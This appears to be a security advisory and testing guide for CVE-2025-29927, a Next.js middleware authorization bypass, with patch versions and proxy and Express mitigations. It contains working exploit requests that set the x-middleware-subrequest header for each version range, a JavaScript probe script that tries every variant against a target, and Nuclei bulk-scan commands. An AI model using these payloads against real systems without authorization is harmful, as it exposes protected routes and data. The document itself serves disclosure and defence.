Next.js Middleware Authorization Bypass - CVE-2025-29927

A critical security vulnerability has been discovered in Next.js that enables attackers to bypass middleware-based authorization checks. This comprehensive guide analyzes the vulnerability, demonstrates testing methods, and provides remediation strategies.

Key Takeaways

  • Critical vulnerability affecting Next.js from version 11.1.4 up to, but not including, the patched releases (15.2.3, 14.2.25, 13.5.9 and 12.3.5)
  • Allows complete bypass of middleware-based security controls
  • Simple exploitation using a single HTTP header
  • Affects self-hosted Next.js applications using middleware
  • Official patches available for all affected versions

Technical Analysis

Understanding the Vulnerability

CVE-2025-29927 stems from a design flaw in how Next.js decides whether to run middleware at all. The server reads the x-middleware-subrequest request header, which was meant purely for internal use: when middleware itself triggers a request back into the same application (a rewrite or an internal fetch), the header marks that request so middleware is not executed again and the application does not loop forever. The check never verified that the header had been set by the server rather than by the client.

If an external request carries the header with the right value (the middleware module's name, such as middleware, src/middleware or pages/_middleware, and on newer versions that name repeated enough times to reach the recursion limit), Next.js treats it as an internal subrequest, skips middleware entirely and forwards the request to the route. Any authentication, authorization, redirect or header-setting logic implemented in middleware is therefore bypassed, while route handlers and pages that enforce nothing themselves serve the response as if the check had passed.

Exploitation Details

The header value that triggers the skip depends on the Next.js version, because the internal check changed over time. The header name is matched case-insensitively, so x-middleware-subrequest and X-Middleware-Subrequest are equivalent. In projects that keep their code under a src/ directory, the middleware module is named src/middleware, so replace middleware with src/middleware in the values below.

Pre-12.2 Versions

GET /api/protected HTTP/1.1
Host: <redacted>
X-Middleware-Subrequest: pages/_middleware

Versions 12.2+

GET /api/protected HTTP/1.1
Host: <redacted>
X-Middleware-Subrequest: middleware

Versions 13.2.0+ (including unpatched 14.x and 15.x)

GET /api/protected HTTP/1.1
Host: <redacted>
x-middleware-subrequest: middleware:middleware:middleware:middleware:middleware

From 13.2.0 the check counts how many times the middleware name appears in the colon-separated value and only skips middleware once that count reaches the internal recursion limit of 5, which is why the name is repeated five times.

Impact Analysis

Affected Systems

  • Self-hosted Next.js applications that use middleware, including deployments served with next start and output: 'standalone' builds, where nothing in front of the server strips the header
  • Applications relying on middleware for authentication/authorization
  • Systems using middleware for security headers or routing logic

Not Affected

  • Applications hosted on Vercel
  • Applications hosted on Netlify
  • Static exports (where middleware is not executed)

Security Implications

  1. Authorization Bypass: Attackers can reach routes whose only gate is middleware (session check, role check, redirect to login) without valid credentials
  2. Security Header Bypass: CSP and other security headers that middleware would add are absent from the response, which can turn an otherwise mitigated XSS into an exploitable one
  3. Cache Poisoning Risk: Where middleware performs rewrites or sets cache-control headers, a bypassed request can produce a different response (for example an error page) that a shared cache may store and serve to other users

Detection and Testing

Using npm audit

  1. Check for Vulnerable Dependencies

    npm audit
    
  2. Check the installed Next.js version and compare it with the patched releases listed in the Remediation Guide

    npm list next
    

Using Nuclei Scanner

The official Nuclei template for CVE-2025-29927 is available in the ProjectDiscovery repository: CVE-2025-29927.yaml

  1. Basic Vulnerability Scan

    nuclei -u https://target-nextjs-app.com -t http/cves/2025/CVE-2025-29927.yaml
    
  2. Bulk Domain Testing

    nuclei -l urls.txt -t http/cves/2025/CVE-2025-29927.yaml
    

Manual Testing Steps

  1. Identify a Next.js application (for example, assets served from /_next/static/ or a default x-powered-by: Next.js response header)
  2. Locate a protected route and record the baseline response an unauthenticated client gets (typically 401, 403 or a redirect to a login page)
  3. Resend the same request with the x-middleware-subrequest header, using the value for the suspected version, or all version variants if the version is unknown
  4. Compare status code and body with the baseline
  5. A 200 with the protected content where the baseline was denied confirms the bypass
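The steps above as a small probe script, added for this article (it is not a tool from the Next.js project or from the advisory). It sends a baseline request to a protected URL, repeats it once per candidate header value, and reports a bypass when a denied baseline turns into a 200. It assumes Node 18 or later for the built-in fetch; the target URL and the TARGET_URL environment variable are assumptions of this example.

```javascript
// Added example for this article. Usage (URL is an assumption):
//   TARGET_URL=https://target.example/api/protected node probe.js

const MIDDLEWARE_NAMES = ["middleware", "src/middleware"]; // src/ layout variant
const RECURSION_DEPTH = 5; // repetitions needed for 13.2.0+

// Every header value to try when the exact Next.js version is unknown.
function candidateHeaderValues() {
  const values = ["pages/_middleware"]; // pre-12.2
  for (const name of MIDDLEWARE_NAMES) {
    values.push(name); // 12.2 up to 13.1
    values.push(Array(RECURSION_DEPTH).fill(name).join(":")); // 13.2.0+
  }
  return values;
}

// A baseline counts as "denied" when the route blocks or bounces an anonymous client.
function isDenied(status) {
  return status === 401 || status === 403 || (status >= 300 && status < 400);
}

// Compare baseline and probe status: "bypass", "no-change" or "inconclusive".
function classify(baselineStatus, probeStatus) {
  if (!isDenied(baselineStatus)) return "inconclusive"; // route was never protected
  if (probeStatus === 200) return "bypass";
  return "no-change";
}

async function fetchStatus(url, headers = {}) {
  // redirect: "manual" keeps a redirect-to-login visible as a 3xx status
  const res = await fetch(url, { headers, redirect: "manual" });
  return res.status;
}

async function probe(url) {
  const baseline = await fetchStatus(url);
  const results = [];
  for (const value of candidateHeaderValues()) {
    const status = await fetchStatus(url, { "x-middleware-subrequest": value });
    results.push({ value, status, verdict: classify(baseline, status) });
  }
  return { baseline, results };
}

if (process.env.TARGET_URL) {
  probe(process.env.TARGET_URL).then(({ baseline, results }) => {
    console.log(`baseline status: ${baseline}`);
    for (const r of results) console.log(`${r.verdict.padEnd(12)} ${r.status}  ${r.value}`);
  });
}

module.exports = { candidateHeaderValues, classify, isDenied, probe };
```

Only run this against systems you are authorized to test. An "inconclusive" verdict means the baseline was not denied, so the route is not a useful test case; pick one that an anonymous client cannot normally reach.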

Responsible Testing

  1. Only test applications you have permission to test
  2. Avoid testing production systems without proper authorization
  3. Report findings responsibly to affected organizations
  4. Follow the target organization’s security disclosure policy

Remediation Guide

Official Patches

Update to these secure versions:

Version Range    Update To
Next.js 15.x     15.2.3
Next.js 14.x     14.2.25
Next.js 13.x     13.5.9
Next.js 12.x     12.3.5

Temporary Mitigations

If immediate patching is not possible, implement one of these workarounds:

  1. Reverse Proxy / Load Balancer Configuration:

    # For Nginx: proxying a header with an empty value removes it from the upstream request
    proxy_set_header x-middleware-subrequest "";
    
  2. Web Application Firewall (WAF):

    • Block or strip requests containing the x-middleware-subrequest header
  3. Custom Express Middleware (only applies when a custom server fronts Next.js; with plain next start the header reaches Next.js directly, so strip it at the proxy instead):

    const express = require("express");
    const app = express();
    // Node lowercases incoming header names, so this key matches any casing the client used
    app.use((req, res, next) => {
      delete req.headers["x-middleware-subrequest"];
      next();
    });
    

Security Best Practices

  1. Defense in Depth

    • Implement multiple layers of security
    • Don’t rely solely on middleware; a request that skips it must still be refused
    • Enforce authorization again in the route handler, server action or data layer
  2. Monitoring and Logging

    • Monitor for suspicious headers
    • Log authentication attempts
    • Track middleware bypasses
  3. Regular Updates

    • Keep Next.js updated
    • Monitor security advisories
    • Implement automated updates

Timeline

Date          Event
2025-02-27    Initial vulnerability disclosure
2025-03-14    Patches developed
2025-03-17    Version 14.2.25 released
2025-03-18    Version 15.2.3 released
2025-03-18    CVE-2025-29927 issued
2025-03-22    Version 13.5.9 released
2025-03-23    Version 12.3.5 released

Conclusion

CVE-2025-29927 represents a significant security risk for self-hosted Next.js applications. The vulnerability’s ease of exploitation combined with its severe impact makes immediate patching crucial. Organizations should prioritize updates and implement additional security layers beyond middleware-based controls.

Additional Resources

  1. Next.js Security Advisory
  2. ProjectDiscovery Analysis
  3. GitHub Security Advisory

FAQs

Q: How do I know if my application is vulnerable?
A: Run npm list next and compare the installed version with the patched releases in the Remediation Guide. If it is older, you self-host, and middleware is what enforces authentication, authorization, security headers or rewrites, you are affected.

Q: Is my Vercel-hosted application affected?
A: No, Vercel-hosted applications are automatically protected.

Q: What should I do if I can’t update immediately?
A: Strip the x-middleware-subrequest header at the reverse proxy or WAF in front of the application (matching the name case-insensitively), confirm with a test request that a protected route still denies access, and schedule the upgrade.


Last updated: March 25, 2025